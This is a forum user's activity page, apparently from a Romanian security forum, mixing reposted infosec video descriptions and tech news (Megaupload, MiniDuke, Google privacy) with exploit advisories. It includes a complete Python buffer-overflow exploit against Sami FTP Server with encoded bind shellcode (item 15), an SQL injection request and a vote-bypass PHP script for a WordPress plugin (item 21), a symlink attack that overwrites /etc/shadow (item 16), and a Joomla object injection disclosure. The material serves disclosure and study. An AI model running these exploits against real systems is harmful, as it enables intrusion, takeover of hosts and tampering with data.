Jump to content

Kwelwild

Active Members
 View Profile  See their activity

  • Posts

    638

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Everything posted by Kwelwild

  1. Kwelwild
    Description: In This video we continue explaining the Cross Site Request Forgery Attack Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://vimeo.com/60928774 Surs?: Web Apps Security Series Part 4 - Csrf
  2. Kwelwild
    Fondatorul Megaupload este tot mai aproape de extradarea in Statele Unite Kim Dotcom, refugiat in Noua Zeelanda, incearca sa scape de acuzatiile de piraterie ale americanilor, piraterie de care se face vinovat prin site-ul de file-sharing Megaupload. Procurorii americani au obtinut o victorie importanta in demersul de a abtine extradarea lui Kim Dotcom, germanul care ar fi cauzat pierderi imense industriei de divertisment din Statele Unite prin site-ul Megaupload. Alaturi de el, americanii doresc sa-i judece si pe Finn Batato, Mathias Ortmann si Bram van der Kolk, toti cu functii de raspundere in compania care a administrat site-ul inchis in 2012. Paul Davison, unul dintre avocatii lui Dotcom, planuieste sa atace la Curtea Suprema a Noii Zeelande hotararea prin care inculpatii pot ajunge sa fie extradati in Statele Unite. Hotararea finala a extradarii a fost deja mutata din luna martie in august si poate fi impinsa spre sfarsitul anului daca se obtine avizul Curtii Supreme. Kim Dotcom a fost arestat anul trecut dar eliberat pe cautiune. In luna ianuarie, la un an de la arestare, afaceristul a lansat un nou site, Mega, un site destinat stocarii de informatii, informatii care pot fi vizibile doar cel care le "urca" si cel caruia ii sunt destinate. Surs?: Fondatorul Megaupload este tot mai aproape de extradarea in Statele Unite - www.yoda.ro
  3. Kwelwild
    http://www.youtube.com/watch?v=M7Vf4Uv7ERc
  4. Kwelwild
    Description: All the ethical hackers know the "blocked ip" problem, When we try to brute force site and the site block our ip address... So i thought on a solution for this problem and i made this video about it. After my old video - Multi IP Threaded Tor BruteForce - POC 1 ( Multi Ip Threaded Tor Bruteforce - Poc ): I thought i can show more... Changing many ip addresses is good for start but you cant go with it to the grocery.... So i went to my computer and started programming (Again)... And that's what i have done About the login web page: This web page programmed on php... After 5 bad tries the web application insert the ip address to the database so no more tries for you ( before this script of course ). I used prepared statements for the username and password so its secured from SQLI... As respectable man told me: "The biggest problem is thinking you're safe when you're not really" Tools used: HconSTF My Script PHPMyAdmin Eclipse Music: Skrillex - First Of The Year (Equinox) Special Thanks To Servers.mn for hosting web page. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Multi Ip Threaded Tor Bruteforce - Poc 2
  5. Kwelwild
    Windows Gather Screen Spy Module In Metasploit http://www.youtube.com/watch?feature=player_embedded&v=0WeTUBS0yQI#! Description: This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. NOTES: set VIEW_CMD to control how screenshots are opened/displayed, the file name will be appended directly on to the end of the value of VIEW_CMD. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://www.youtube.com/watch?v=0WeTUBS0yQI Surs?: Windows Gather Screen Spy Module In Metasploit
  6. Kwelwild
    1. Poate c? atacurile venite din partea româniei c?tre ??rile str?ine au ie?it prea mult în eviden??, iar atunci s-au gândit s? ne ard?. Întrebarea mea este, cu ce s? ne ard??! Guvernul ?i site-urile f?cute în word...
  7. Kwelwild
    MiniDuke, softul periculos care a afectat guvernele europene, poate fi eliminat din calculatoare cu o unealta romaneasca O versiune initiala a sofisticatului software periculos este activa inca din mai 2012, potrivit Bitdefender Romanii de la Bitdefender pun la dispozitia tuturor un soft gratuit cu ajutorul caruia pot elimina din calculatoare periculosul soft MiniDuke, care a atacat guvernele mai multor state europene. MiniDuke a fost detectat de Bitdefender Labs cu aproape un an in urma, iar respectiva versiune de malware a fost adaugata in baza de virusipe 26 mai 2012, desi soft-ul periculos nu era cunoscut la acel moment pentru efectele sale. Varianta initiala a MiniDuke difera de cea descoperita acum, in primul rand prin faptul ca utilizeaza un mod diferit de instalare. In plus, aceasta acceseaza pagina de internet time-server.org, pentru a vedea care e data curenta in China. Comportamentul acestei prime versiuni de malware este, in rest, similar celui anuntat recent. ’’Software-ul periculos MiniDuke poate provoaca daune majore sau poate colecta cantitati uriase de informatii pe parcursul a 10 luni. Descoperirea unei versiuni initiale a acestui virus, in mai 2012, sugereaza ca suntem inca la inceput in a intelege dimensiunea si scopul MiniDuke. Analizam in continuare software-ul si vom face publice si alte detalii importante atunci cand vor fi descoperite’’, a declarat Catalin Cosoi, Chief Security Strategist, Bitdefender. Analizele efectuate pana acum releva ca MiniDuke extrage informatii din sistemele informatice ale guvernelor Irlandei, Belgiei, Romaniei, Portugaliei si Cehiei precum si din alte institu?ii, precum un furnizor de servicii medicale din Statele Unite ale Americii sau organizatii din Japonia, Brazilia etc. Antivirusul Bitdefender elimina toate variantele cunoscute ale MiniDuke. Compania a anuntat, de asemenea, disponibilitatea unui utilitar de dezinfec?ie gratuit pentru acest virus. Pentru o analiza mai detaliat? a versiunii initiale a MiniDuke, accesa?i raportul tehnic de pe blogul Bitdefender Labs. Surs?: MiniDuke, softul periculos care a afectat guvernele europene, poate fi eliminat din calculatoare cu o unealta romaneasca - www.yoda.ro
  8. Kwelwild
    DIN INTERIOR. În lumea hackerilor „Noi nu facem fraude cu carduri!"
  9. Kwelwild
    Atac cibernetic fara precedent asupra Romaniei. Specialistii incearca sa opreasca scurgerea de date. Cel mai probabil, un serviciu de spionaj strain a trimis virusi catre serverele guvernamentale, in incercarea de a obtine date secrete. Actiunea este in derulare, iar Serviciul Roman de Informatii avertizeaza ca siguranta nationala este in pericol. Specialistii lucreaza chiar acum, incercand sa opreasca atacul, potrivit StirilePROTV. Unul dintre serverele guvernamentale a fost invins de virusul care a reusit sa se strecoare in interior. De acolo, a inceput sa transmita informatii sensibile celor care l-au trimis. Nu este un scenariu de film ci ceea ce se intampla chiar in acest moment. Alerta s-a declansat acum doua zile, cand a fost descoperit virusul strecurat in anumite servere din romania. Cel mai probabil un serviciu secret strain ataca la nivel cibernetic Romania. Nu calculatoarele noastre de acasa, ci pe cele ale institutiilor de stat in care sunt stocate informatii confidentiale sau chiar secrete. Serviciul roman de informatii a confirmat atacul, insa nu a vrut sa precizeze ce minister, agentie sau serviciu secret este tinta lui. Tehnica este folosita de un an de zile cu succes de hackerii care vor sa fure parole sau informatii de oriunde din lume. Un mail aparent inofensiv este trimis catre o persoana care lucreaza in zona guvernamentala, de exemplu o felicitare. Cand aceasta o deschide, un virus se instaleaza nestiut pe calculator. De acolo, incepe sa transmita fisiere, mailuri si parole catre cel care l-a infiltrat acolo. Acesta este cel dea-l doilea atac cibernetic considerat extrem de periculos pentru siguranta nationala a Romaniei. Anul trecut, serviciile speciale s-au confruntat o grupare care poarta ampernta unor hackeri din Rusia numiti Octombrie Rosu si care a vizat institutii de stat de la noi. Acel atac a fost oprit. Acum, autoritatile se straduiesc sa limiteze pagubele si sa opreasca fluxul de informatii sensibile din serverele guvernamentale catre ceea ce pare a fi un serviciu de spionaj extern. Surs?: Atac cibernetic fara precedent asupra Romaniei. Specialistii incearca sa opreasca scurgerea de date - www.yoda.ro
  10. Kwelwild

    intrebare

    Kwelwild replied to deirdre's topic in Cosul de gunoi

    Polonic Polonic...?tiam eu c? e?ti tu (aveai semn?tura): On behalf DIICOT, SRI and FBI, amin! Dar se pare c? ai ?ters-o. Rootkit-ul ?la nu mai scapi de el, e ceva gen Polonic pe RST.
  11. Kwelwild
    [Hack Of The Day Part 6] Writing A Shellcode Decoder In Python Description: In this video, we pick up where we left off in the last video. The goal is to write a full fledged decoder which can take any shellcode as input, and output shellcode implementing the decoding schema we outlined in the previous video. We modify decode.nasm to understand the essential parts of the decoder - specifically ones which are dependent on the input shellcode. We then create a template using which we can easily write the decoder shellcode using a Python script. Enjoy and please do leave your comments behind! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: [Hack Of The Day Part 6] Writing A Shellcode Decoder In Python
  12. Kwelwild
    The social network invites journalists to check out the feed's "new look" at its headquarters on Thursday. (Credit: Facebook) Get ready for some changes to your Facebook profile. The social network is unveiling a new design for its News Feed on Thursday, according to an invite sent to journalists today. The bare-bones invite tells journalists to "Come see a new look for News Feed," at Facebook's Menlo Park, Calif., headquarters next week. Coincidentally, a new look for Timeline was spotted today in New Zealand, a country where Facebook typically tries out new features. The layout had a single- Surs?: Facebook to unveil new News Feed design next week | Internet & Media - CNET News
  13. Kwelwild
    Companiei americane i se cer explicatii pentru faptul ca n-a schimbat termenii privind datele confidentiale ale utilizatorilor desi i s-a cerut acest lucru inca din luna octombrie a anului trecut. Google are din nou probleme in Europa, probleme legate de felul in care strange datele celor care-i folosesc serviciile. Compania americana a schimbat termenii cu privire la datele confidentiale inca din luna martie a anului trecut, prima tara care a luat pozitie fiind Franta. "In recomadarea din octombrie 2012, am cerut ca termenii companiei americane sa fie modificati pentru o mai buna proctectie a datelor clientilor. Constantam ca nici pana azi Google nu a luat masuri pentru a se alinia cerintelor Directivei 95/46/EC", se arata in plangerea semnata de 30 de oficiali europeni. Americanii au schimbat "privacy policy" pentru a "pune la un loc" (spun ei) datele utilizatorilor a peste 60 de produse, printre acestea aflandu-se YouTube si GoogleMail. Compania nu a raspuns plangerii depuse de oficialii europeni. Surs?: Google va fi chemat in justitie pentru strangerea excesiva de date de la utilizatori - www.yoda.ro
  14. Kwelwild
    Though Google is a U.S. company, its American rights don't transpose across the pond. A court case will determine whether Google has to comply with EU law, which could have far-reaching consequences for European users. Google's New York City headquarters. (Credit: Zack Whittaker/CNET) How Google and other American Internet companies operate in Europe could come down to a link that, depending on what side of the Atlantic Ocean you're on, should or should not be deleted. A case heard Tuesday before the European Court of Justice (ECJ) hinges on a complaint submitted by a Spanish citizen who searched Google for his name and found a news article from several years earlier, saying his property would be auctioned because of failed payments to his social security contributions. Spanish authorities argued that Google, other search engines, and other Web companies operating in Spain should remove information such as that if it is believed to be a breach of an individual's privacy. Google, however, believes that it should not have to delete search results from its index because the company didn't create it in the first place. Google argued that it is the publisher's responsibility and that its search engine is merely a channel for others' content. The ECJ's advocate-general will publish its opinion on the case on June 25, with a judgment expected by the end of the year. The outcome of the hearing will affect not only Spain but also all of the 27 member states of the European Union. In principle, this fight is about freedom of speech versus privacy, with a hearty dash of allegations of censorship mixed in. In reality, this could be one of the greatest changes to EU privacy rules in decades -- by either strengthening the rules or negating them altogether. The European view is simple: If you're at our party, you have to play by our rules. And in Europe, the "right to be forgotten" is an important one. "Facebook and Google argue they are not subject to EU law as they are physically established outside the EU," a European Commission spokesperson told CNET. In new draft privacy law proposals, the message is, "as long as a company offers its goods or services to consumers on the EU territory, EU law must apply." While Europe has some of the strongest data protection and privacy laws in the world, the U.S. doesn't. And while the U.S. has some of the strongest free speech and expression laws in the world, enshrined by a codified constitution, most European countries do not, instead favoring "fair speech" principles. Google is also facing another legal twist: Spanish authorities are treating it like a media organization without offering it the full legal protection of one. "The European view is simple: If you're at our party, you have to play by our rules. And in Europe, the "right to be forgotten" is an important one." Newspapers should be exempt from individual takedown requests to preserve freedom of speech, according to Spanish authorities, but Google should not enjoy the same liberties, despite having no editorial control and despite search results being determined by algorithms. Though Google is branded a "publisher" like newspapers, the search giant does not hold media-like protection from takedowns under the country's libel laws. This does not translate across all of Europe, however. Some European member states target newspapers directly and are held accountable through press regulatory authorities in a bid to balance freedom of speech and libel laws. One of Spain's highest courts, the Agencia Espanola de Proteccion de Datos (AEPD), found in favor of the complainant in early 2011 and ruled that Google should delete the search result. This case is one of around 180 other ongoing cases in the country. Google appealed the decision and the case was referred to the highest court in Europe, the ECJ, which will eventually determine if the search giant is the "controller" of the data or whether it is merely a host of the data. The case will also decide on whether U.S.-based companies are subject to EU privacy law, which may mean EU citizens' have to take their privacy cases to U.S. courts to determine whether Google is responsible for the damage caused by the "diffusion of personal information." In a blog post on Tuesday, Bill Echikson, Google's "head of free expression," said the search giant "declined to comply" with a request by Spanish data protection authorities, as the search listing "includes factually correct information that is still publicly available on the newspaper's Web site." "There are clear societal reasons why this kind of information should be publicly available. People shouldn't be prevented from learning that a politician was convicted of taking a bribe, or that a doctor was convicted of malpractice," Echikson noted. "We believe the answer to that question is 'no'. Search engines point to information that is published online - and in this case to information that had to be made public, by law. In our view, only the original publisher can take the decision to remove such content. Once removed from the source webpage, content will disappear from a search engine's index." EU's latest privacy proposal: The 'right to be forgotten' Should the ECJ finds in favor of the Spanish complainant, it will see the biggest shakeup to EU privacy rules in close to two decades and would enable European citizens a "right to be forgotten." In January 2011, the European Commission lifted the lid on draft proposals for a single one-size-fits-all privacy regulation for its 27 member states. One of the proposals was the "right to be forgotten," empowering every European resident the right to force Web companies as well as offline firms to delete or remove their data to preserve their privacy. For Europeans, privacy is a fundamental right to all residents, according to Article 8 of the European Convention of Human Rights, in which it states: "Everyone has the right to respect for his private and family life, his home and his correspondence." It does however add a crucial exception. "There shall be no interference by a public authority with the exercise of this right except... for the protection of the rights and freedoms of others." The European Parliament in Strasbourg, France, where the new data and privacy law will be voted on later this year. A vote by the Parliament's Civil Liberties (LIBE) committee in June will determine whether the Commission can push the draft proposals into law. (Credit: European Parliament/Flickr) Because U.S.-based technology giants like Google, Facebook, and Twitter have users and in many cases a physical presence in Europe, they must comply with local laws. The "right to be forgotten" would force Facebook and Twitter to remove any data it had on you, as well as Google removing results from its search engine. It would also extraterritorially affect users worldwide outside the European Union who would also be unable to search for those removed search terms. Such Web companies have said (and lobbied to that effect) that the "right to be forgotten" should not allow data to be removed or manipulated at the expense of freedom of speech. This, however, does not stop with republished material and other indexed content, and most certainly does not apply to European law enforcement and intelligence agencies. Two continents, separated by 'free' and 'fair speech' The U.S. and the EU have never seen eye-to-eye on data protection and privacy. For Americans and U.S.-based companies, the belief is that crossover between freedom of speech and privacy overlaps in "a form of censorship," according to Google's lawyers speaking during the Spanish court case. In the U.S., you can freely say the most appalling words, so long as they don't lead to a crime or violence against a person or a group of people. In European countries such as the U.K. words can lead to instant arrest. Europe's laws allow for "fair speech" in order to prevent harassment, fear of violence, or even alarm and distress. It's a dance between the American tradition of protecting the individual and the European tradition of protecting society. Google is fundamentally so very American in this regard. That said, Google already filters and censors its own search results at the behest of governments and private industry, albeit openly and transparently. Google will agree to delete links that violate copyrights under the Digital Millennium Copyright Act, which seeks to remove content from Google's search results that may facilitate copyright infringement. Google also complies, when forced by a court, with numerous types of government requests, not limited to subpoenas, search warrants, and National Security Letters, or so-called 'gagging orders'. It also discloses those requests and when it complies with them. And it's a system not that dissimilar to what it's being asked to do in Europe. Whose jurisdiction is Google under: U.S., EU, or both? While Europe's privacy principles apply to the Web, it's unclear whether they apply to data "controllers" established outside of the European Union. But several European court cases have sided with local law. A German court found that Facebook fell under Irish law because the social networking company had a physical presence in Ireland, another EU member state. In Google's case, Spanish authorities are making a similar argument, claiming that Google is processing data in a European state and therefore EU law should apply. Many American companies have voiced their objections to the proposed EU privacy law, including Amazon, eBay, Yahoo, according to a lobbying watchdog. It could still take a year or two for the law to be ratified. "Exempting non-EU companies from our data protection regulation is not on the table. It would mean applying double standards," said Europe's Justice Commissioner Viviane Reding, the top politician in Europe on data protection and privacy rules in the region, in an interview with the Financial Times of London. The new EU Data Protection Regulation, proposed by the European Commission and currently being debated in the European Parliament, will likely be voted on by June. But this fight isn't as much about censorship as one might think. It's about a cultural difference between two continents and perspectives on what freedom of speech can and should be. It's also about privacy, and whether privacy or free speech is more important. Surs?: Google's European conundrum: When does privacy mean censorship? | Security & Privacy - CNET News
  15. Kwelwild
    Sami FTP Server 2.0.1 LIST Command Buffer Overflow #!/usr/bin/env python # Exploit Title: Sami FTP LIST buffer overflow # Date: 27 Feb 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.karjasoft.com/old.php # Version: Sami FTP Server 2.0.1 # Tested on: Windows XP Pro SP1, English # Windows XP Pro SP2, English # # Description: # A buffer overflow is triggered when a long LIST command is sent to the # server and the user views the Log tab. # from socket import * import struct, sys IP = sys.argv[1] # Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/ # Remove bad chars using msfencode: # msfencode -b "\x00\x0a\x0d\x2f" -i w32-bind-ngs-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "\xd9\xc7\xbe\x4d\xa5\xde\x30\xd9\x74\x24\xf4\x5f\x2b\xc9" + "\xb1\x36\x31\x77\x19\x03\x77\x19\x83\xc7\x04\xaf\x50\xef" + "\xf9\x4b\x10\x61\xca\x18\x50\x8e\xa1\x68\x81\x05\xdb\x9c" + "\x32\x67\x04\x17\x72\xa0\x0b\x3f\x0e\x23\xc2\x57\xc2\x9c" + "\xd6\x95\x4a\x45\x4f\xae\xf9\xe1\xd8\xdf\xf7\x69\xaf\x39" + "\xb2\x89\x99\x09\x94\x41\x50\x76\x31\xaa\xc9\x39\xef\x0c" + "\x5f\xee\x5e\x0c\xb0\x3c\xc5\x5d\xc4\x61\x39\xe9\x86\x84" + "\x39\xec\xdd\x3d\xf2\xce\x20\xa8\x53\x3e\xf1\x68\xd7\x74" + "\x64\x6d\x09\xc0\xb0\xc1\xe1\x58\x95\xdd\x36\xea\x90\x2a" + "\x7c\x2b\x2e\x3f\xdf\xb8\x9b\x9b\xe1\x57\x14\x54\xf5\xf6" + "\xa0\xd1\xea\xf9\x5f\x6c\xfa\xf9\x9b\xff\x50\x7d\x9d\xf6" + "\xd3\x76\x6f\x56\x18\xd4\x90\xb6\x77\x4f\xee\x08\x0b\x1a" + "\x5e\x2a\x46\x1b\x70\x7f\x67\x34\xe4\xfe\xb7\x4b\xf8\x8f" + "\xfb\xd9\x17\xd8\x56\x48\xe7\x36\x2d\xb3\x63\x4e\x1f\xe6" + "\xde\xc6\x03\x6b\xbb\x36\x49\x0f\x67\x0e\xfa\x5b\xcc\xa8" + "\xbb\x72\x12\x60\xc3\xb9\x31\xdf\x99\x93\x6b\x19\x5a\xfb" + "\x84\xf2\x37\x51\xc2\xae\x48\x03\x08\xc5\xf1\x50\x39\x13" + "\x02\x57\x45" ) # EIP overwritten at offset 218 # JMP ESP at 10028283 C:\Program Files\PMSystem\Temp\tmp0.dll (Universal) buf = "A" * 218 + struct.pack("<I", 0x10028283) + "\x90" * 37 + shellcode s = socket(AF_INET, SOCK_STREAM) s.connect((IP,21)) print s.recv(1024) s.send("USER superkojiman\r\n") print s.recv(1024) s.send("PASS letmein\r\n") print s.recv(1024) print "[+] sending payload of size", len(buf) s.send("LIST " + buf + "\r\n") print s.recv(1024) s.close() print "[+] sent. Connect to %s on port 28876" % (sys.argv[1],) Surs?: Sami FTP Server 2.0.1 LIST Command Buffer Overflow
  16. Kwelwild
    Oracle Auto Service Request insecure creates files in /tmp using time stamps allow for root-owned files to be clobbered. Oracle Auto Service Request /tmp file clobbering vulnerability http://www.oracle.com/us/support/systems/premier/auto-service-request-155415.html http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm I noticed it creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know when around the time the root administrator will be using this utility. [larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done root executes the asr command: [root@oracle-os-lab01 bin]# ./asr register OR register [-e asr-manager-relay-url]: register ASR unregister : unregister ASR show_reg_status : show ASR registration status test_connection : test connection to Oracle . . . version : show asr script version exit help : display a list of commands ? : display a list of commands asr> /etc/shadow is now overwritten with the contents of /tmp/status1_020213003722 root # cat /etc/shadow id State Bundle 68 ACTIVE com.sun.svc.asr.sw_4.3.1 Fragments=69, 70 69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1 Master=68 70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1 Master=68 72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0 Fragments=73 73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0 Master=72 67 ACTIVE com.sun.svc.ServiceActivation_4.3.1 Problem code: The asr binary is a wrapper for a java class, the following snippet of code is where the error lies: /sbin/sh:root@unix-solaris# grep -n tmp asr 409: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 410: file2=/tmp/status2_`date '+%m%d%y%H%M%S'` 411: file3=/tmp/status3_`date '+%m%d%y%H%M%S'` 557: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 681: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 691: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 706: file1=/tmp/parse_jetty_`date '+%m%d%y%H%M%S'` 710: file2=/tmp/parse_jetty_port_`date '+%m%d%y%H%M%S'` 797: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 987: hostnameTempFile=/tmp/status1_`date '+%m%d%y%H%M%S'` 988: tempFile=/tmp/status2_`date '+%m%d%y%H%M%S'` 989: tempHostname=/tmp/status3_`date '+%m%d%y%H%M%S'` 1303: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 1334: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 1343: file1=/tmp/status1_`date '+%m%d%y%H%M%S'` 1344: file2=/tmp/status2_`date '+%m%d%y%H%M%S'` 1345: file3=/tmp/status3_`date '+%m%d%y%H%M%S'` 1405: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'` 2198: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'` This affects the software package on both Solaris and Linux. Vendor notified about a month ago. ? @_larry0 Larry W. Cashdollar http://otiose.dhs.org/ Surs?: Oracle Auto Service Request File Clobber ? Packet Storm
  17. Kwelwild
    Description: MASTIFF2HTML is a python program that is used to create a GUI results interface in HTML from MASTIFF results. Download the python program at: https://github.com/1aN0rmus/TekDefense/blob/master/MASTIFF2HTML.py MASTIFF is an automated static malware analysis framework. Learn more about MASTIFF at: http://www.tekdefense.com/news/2013/2/22/tektip-ep23-mastiff-with-a-splash-of-maltrieve.html Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: http://www.securitytube.net/video/7033
  18. Kwelwild
    Description: This video demonstrates how to use cuckoo sandbox for malware analysis on BackTrack 5R3. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Cuckoo Sandbox Demo
  19. Kwelwild

    Noroc!

    Kwelwild replied to PielesiOs's topic in Bine ai venit

    Salut, te ?tiu
  20. Kwelwild
    Feds strike a deal with alleged illegal streaming site operator Homeland Security banner that goes on seized domain name sites. (Credit: Screenshot by David Carnoy/CNET) After taking down Channelsurfing.net and arresting its alleged owner in 2011, the feds now seem to be easing up. Before going to trial, the government struck a deal earlier this month with the alleged site owner Brian McCarthy. In a "Deferred Prosecution" memo filed on February 11, which was obtained by TorrentFreak, U.S. Attorney Preet Bharara writes that "after a thorough investigation, it has been determined that the interest of the United States and your own interest will best be served by deferring prosecution in this District. Prosecution will be deferred during the term of your good behavior and satisfactory compliance with the terms of this agreement." Channelsurfing.net was seized in February 2011 during a massive Department of Homeland Security crackdown on sports streaming sites that were allegedly infringing on copyright laws. At the time, Bharara said in a statement, "The illegal streaming of professional sporting events over the Internet deals a financial body blow to the leagues and broadcasters who are forced to pass their losses off to the fans in the form of higher priced tickets and pay-per-view events... the seizures of these infringing Web sites reaffirm our commitment to working with our law enforcement partners to protect copyrighted material and put the people who steal it out of business." Shortly after the site's seizure, McCarthy was arrested and accused of criminal copyright infringement, according to TorrentFreak. Channelsurfing.net did not actually stream sports itself but instead linked to external sport streams. It's unclear why the feds are letting McCarthy off the hook. Under the terms of the deal he came to with the government, he has to show good behavior, find a legal job, not violate any laws, and steer clear of anything to do with illegal Internet streaming. He also has to pay back $351,033, which he allegedly made via Channelsurfing.net, according to TorrentFreak. Under its program "Operation In Our Sites," the Department of Homeland Security has continued to crack down on illegal sports streaming sites over the past couple of years. Last February, it seized 307 Web sites that either live-streamed sports or sold fake NFL paraphernalia. It also arrested a man who allegedly operated nine of the streaming sites on criminal copyright infringement charges. According to the U.S. Immigration and Customs Enforcement, more than 700 domain names have been seized since "Operation In Our Sites" launched in 2010. Surs?: Feds strike a deal with alleged illegal streaming site operator | Security & Privacy - CNET News
  21. Kwelwild
    Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities # Exploit Title: Wordpress plugin: Comment Rating SQL injection # Google Dork: # Date: 21/02/2013 # Exploit Author: ebanyu # Url Author: www.ebanyu.com.ar # Vendor Homepage: wealthynetizen.com # Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/ # Version: 2.9.32 # Tested on: Fedora 18 + mysql 5.5 + php 5.4 Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php First take the IP from HTTP_X_FORWARDED_FOR header. ----------------------------------------------------------------------- 48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR"); 49 if(strstr($row['ck_ips'], $ip)) { 50 // die('error|You have already voted on this item!'); 51 // Just don't count duplicated votes 52 $duplicated = 1; 53 $ck_ips = $row['ck_ips']; 54 } Later made a UPDATE without filter the input. ------------------------------------------------------------------------ 77 $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id"; So let's take a look in the DB mysql> select * from wp_comment_rating; +---------------+----------------+--------------+----------------+ | ck_comment_id | ck_ips | ck_rating_up | ck_rating_down | +---------------+----------------+--------------+----------------+ | 2 | ,20.209.10.130 | 1 | 0 | | 3 | | 0 | 0 | +---------------+----------------+--------------+----------------+ 2 rows in set (0.00 sec) Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header: GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1 Host: 192.168.1.10 Accept-Encoding: gzip, deflate X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2# Connection: keep-alive And the result is: mysql> select * from wp_comment_rating; +---------------+---------------------+--------------+----------------+ | ck_comment_id | ck_ips | ck_rating_up | ck_rating_down | +---------------+---------------------+--------------+----------------+ | 2 | wordpress@localhost | 2 | 0 | | 3 | | 0 | 0 | +---------------+---------------------+--------------+----------------+ 2 rows in set (0.00 sec) Cheers ======================================================================================= # Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation # Date: 21/02/2013 # Exploit Author: ebanyu # Url Author: www.ebanyu.com.ar # Vendor Homepage: wealthynetizen.com # Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/ # Version: 2.9.32 # Tested on: Fedora 18 + mysql 5.5 + php 5.4 Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php First take the IP from HTTP_X_FORWARDED_FOR header. ----------------------------------------------------------------------- 48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR"); 49 if(strstr($row['ck_ips'], $ip)) { 50 // die('error|You have already voted on this item!'); 51 // Just don't count duplicated votes 52 $duplicated = 1; 53 $ck_ips = $row['ck_ips']; 54 } Later made a UPDATE without filter the input. ------------------------------------------------------------------------ 77 $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id"; Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request. A simple POC is made in php. <?PHP define('HOST','http://localhost/wordpress/'); define('IDCOMMENT',2); $url=parse_url(HOST); define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_'); for($i=0;$i<1;$i++) lvlup(); function lvlup(){ global $url; $header = "GET ".URL." HTTP/1.1 \r\n"; $header.= "Host: ".$url['host']."\r\n"; $header.= "Accept-Encoding: gzip, deflate \r\n"; $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n"; $header.= "Connection: close \r\n\r\n"; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_connect($socket,$url['host'], 80); socket_write($socket, $header); socket_close($socket); } ?> Surs?: Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities
  22. Kwelwild
    Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability ------------------------------------------------------------------- Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability ------------------------------------------------------------------- [-] Software Link: http://www.joomla.org/ [-] Affected Versions: Version 3.0.2 and earlier 3.0.x versions. Version 2.5.8 and earlier 2.5.x versions. [-] Vulnerability Description: The vulnerable code is located in /plugins/system/highlight/highlight.php: 56. // Get the terms to highlight from the request. 57. $terms = $input->request->get('highlight', null, 'base64'); 58. $terms = $terms ? unserialize(base64_decode($terms)) : null; User input passed through the "highlight" parameter is not properly sanitized before being used in an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the application scope. Successful exploitation of this vulnerability doesn't require authentication, but requires the "System Highlight" plugin to be enabled (such as by default configuration). [-] Solution: Upgrade to version 3.0.3 or 2.5.9. [-] Disclosure Timeline: [31/10/2012] - Vendor notified [08/11/2012] - Vendor asked for a proof of concept [08/11/2012] - Proof of concept provided to the vendor [04/02/2013] - Vendor update released [27/02/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1453 to this vulnerability. [-] Credits: 